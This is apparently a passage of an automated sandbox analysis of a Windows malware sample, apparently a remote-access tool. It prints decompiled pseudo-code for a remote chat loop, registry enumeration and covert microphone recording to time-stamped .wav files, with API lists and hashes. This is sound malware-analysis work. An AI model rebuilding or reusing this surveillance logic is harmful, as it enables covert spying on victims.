				_t97 =  *_t29 - 0x3a;
				if(_t97 == 0) {
					_t35 = E0040180C( &_v28, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t62 = E00406DD9(_t35);
					__eflags = _t62;
					if(_t62 == 0) {
						L12:
						E004017DD( &_v28);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__eflags = 0;
						return 0;
					}
					 *0x41b794 = E00407033(_t62, "DisplayMessage");
					 *0x41b798 = E00407033(_t62, "GetMessage");
					_t41 = E00407033(_t62, "CloseChat");
					_t105 = _t104 + 8;
					 *0x41b79c = _t41;
					 *0x41b790 = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(_t95, 0x74, 0x41b738);
					L10:
					_t63 = HeapCreate(0, 0, 0);
					_t45 =  *0x41b798(_t63,  &_v12);
					__eflags = _t45;
					if(_t45 != 0) {
						_t105 = _t105 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
						E004020C2(_t95, 0x3b, _v12);
						HeapFree(_t63, 0, _v12);
					}
					goto L10;
				}
				_t109 = _t97 != 1;
				if(_t97 != 1) {
					goto L12;
				}
				_t50 = E00412881( &_v92);
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
				_t51 =  *0x41b794(_t50);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_t51 == 0) {
					goto L12;
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
				E00412855( &_v60, _t104 - 0x10,  &_v60);
				E004020C2(_t95, 0x3b, 0x41576c);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				L4:
				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
					if(__eflags >= 0) {
						goto L12;
					}
				}
				TranslateMessage( &_v120);
				DispatchMessageA( &_v120);
				goto L4;
			}

























                                  0x0040295e
                                  0x00402967
                                  0x00402971
                                  0x0040297a
                                  0x00402983
                                  0x0040299b
                                  0x004029ab
                                  0x004029ba
                                  0x004029c4
                                  0x004029c9
                                  0x004029cc
                                  0x004029cf
                                  0x00402a80
                                  0x00402a87
                                  0x00402a93
                                  0x00402a96
                                  0x00402a98
                                  0x00402b33
                                  0x00402b36
                                  0x00402b3e
                                  0x00402b47
                                  0x00402b4f
                                  0x00402b53
                                  0x00402b53
                                  0x00402aaf
                                  0x00402abf
                                  0x00402ac4
                                  0x00402ac9
                                  0x00402acc
                                  0x00402ad3
                                  0x00402adf
                                  0x00402ae9
                                  0x00402aee
                                  0x00402af7
                                  0x00402afe
                                  0x00402b05
                                  0x00402b08
                                  0x00402b0a
                                  0x00402b17
                                  0x00402b21
                                  0x00402b2b
                                  0x00402b2b
                                  0x00000000
                                  0x00402b08
                                  0x004029d5
                                  0x004029d6
                                  0x00000000
                                  0x00000000
                                  0x004029ec
                                  0x004029f5
                                  0x004029fc
                                  0x00402a08
                                  0x00402a10
                                  0x00000000
                                  0x00000000
                                  0x00402a22
                                  0x00402a32
                                  0x00402a3d
                                  0x00402a45
                                  0x00000000
                                  0x00402a4b
                                  0x00402a72
                                  0x00000000
                                  0x00000000
                                  0x00402a78
                                  0x00402a60
                                  0x00402a6a
                                  0x00000000

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                  • SetEvent.KERNEL32(?), ref: 0040297A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040299B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                  • GetMessageA.USER32 ref: 00402A52
                                  • TranslateMessage.USER32(?), ref: 00402A60
                                  • DispatchMessageA.USER32 ref: 00402A6A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                  • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 1701728818-749203953
                                  • Opcode ID: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                  • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                  • Opcode Fuzzy Hash: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                  • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BE34, Relevance: 39.1, APIs: 26, Instructions: 148registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
				void* _v8;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				void* _t28;
				long _t29;
				void* _t35;
				char* _t38;
				char* _t39;
				char* _t40;
				char* _t41;
				char* _t42;
				char* _t43;
				char* _t44;
				void* _t54;
				void* _t56;
				char* _t73;
				void* _t77;
				void* _t79;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t28 = E0040BD9B( &_a4);
				_t79 = _t77 - 0x10 + 0x10;
				_t47 = 0;
				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
				_t90 = _t29;
				if(_t29 != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41bde0, 0x72, "3");
				} else {
					E0040BB20( &_v8, _t90, _v8);
					_pop(_t54);
					_t73 = "0";
					if(_a24 != 0) {
						_t73 = "1";
					}
					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
					_t56 = 0x41b310;
					_t38 =  &_v88;
					L00414176();
					_t39 =  &_v56;
					L00414140();
					_t40 =  &_v40;
					L00414140();
					_t41 =  &_v24;
					L00414140();
					_t42 =  &_v72;
					L00414140();
					_t43 =  &_v104;
					L00414140();
					_t44 =  &_v136;
					L00414140();
					L00414140();
					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					RegCloseKey(_v8);
					_t47 = 1;
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t47;
			}




























                                  0x0040be49
                                  0x0040be4f
                                  0x0040be54
                                  0x0040be5a
                                  0x0040be67
                                  0x0040be6d
                                  0x0040be6f
                                  0x0040bfea
                                  0x0040bff7
                                  0x0040be75
                                  0x0040be78
                                  0x0040be80
                                  0x0040be81
                                  0x0040be86
                                  0x0040be88
                                  0x0040be88
                                  0x0040beaf
                                  0x0040beb5
                                  0x0040beca
                                  0x0040becf
                                  0x0040bed8
                                  0x0040bedc
                                  0x0040bee5
                                  0x0040bee9
                                  0x0040bef2
                                  0x0040bef6
                                  0x0040beff
                                  0x0040bf03
                                  0x0040bf0c
                                  0x0040bf10
                                  0x0040bf19
                                  0x0040bf20
                                  0x0040bf2a
                                  0x0040bf39
                                  0x0040bf44
                                  0x0040bf4d
                                  0x0040bf56
                                  0x0040bf5f
                                  0x0040bf68
                                  0x0040bf71
                                  0x0040bf7a
                                  0x0040bf83
                                  0x0040bf8f
                                  0x0040bfa0
                                  0x0040bfac
                                  0x0040bfbd
                                  0x0040bfc9
                                  0x0040bfd2
                                  0x0040bfd8
                                  0x0040bfd8
                                  0x0040bfff
                                  0x0040c00b

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                    • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                    • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                  • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                    • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                    • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                    • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                    • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                    • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                  • String ID:
                                  • API String ID: 3909728815-0
                                  • Opcode ID: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                  • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                  • Opcode Fuzzy Hash: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                  • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401640, Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 102stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E00401640(void* __edx, intOrPtr _a8, char _a11) {
				char _v5;
				char _v12;
				void* _v28;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char _v188;
				int _t23;
				char* _t25;
				char* _t32;
				char* _t33;
				char* _t34;
				CHAR* _t36;
				intOrPtr _t37;
				void* _t56;

				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
				if(_a8 == 0x3c0) {
					__imp__time( &_v12, _t56);
					_t25 =  &_v12;
					__imp__localtime(_t25);
					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
					_t32 =  &_v76;
					L00414152();
					_t33 =  &_v108;
					L0041414C();
					_t34 =  &_v60;
					L00414146();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E004013BE(_t34, 0x41b1a0);
					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					0x41b1a0->lpData = _t36;
					_t37 =  *0x41b1d8; // 0x0
					 *0x41b1a4 = _t37;
					 *0x41b1a8 = 0;
					 *0x41b1ac = 0;
					 *0x41b1b0 = 0;
					 *0x41b1b4 = 0;
					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t23;
			}




















                                  0x00401649
                                  0x00401650
                                  0x0040165d
                                  0x00401668
                                  0x0040166e
                                  0x00401672
                                  0x00401687
                                  0x0040169e
                                  0x004016bb
                                  0x004016c4
                                  0x004016cd
                                  0x004016d1
                                  0x004016da
                                  0x004016de
                                  0x004016ea
                                  0x004016f3
                                  0x004016fc
                                  0x00401705
                                  0x0040170e
                                  0x00401717
                                  0x00401726
                                  0x0040172d
                                  0x0040173d
                                  0x00401748
                                  0x0040174e
                                  0x00401753
                                  0x00401758
                                  0x0040175f
                                  0x00401764
                                  0x00401769
                                  0x0040176e
                                  0x0040177c
                                  0x0040178b
                                  0x00401791
                                  0x00401795
                                  0x0040179c

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                  • time.MSVCRT ref: 00401668
                                  • localtime.MSVCRT ref: 00401672
                                  • strftime.MSVCRT ref: 00401687
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
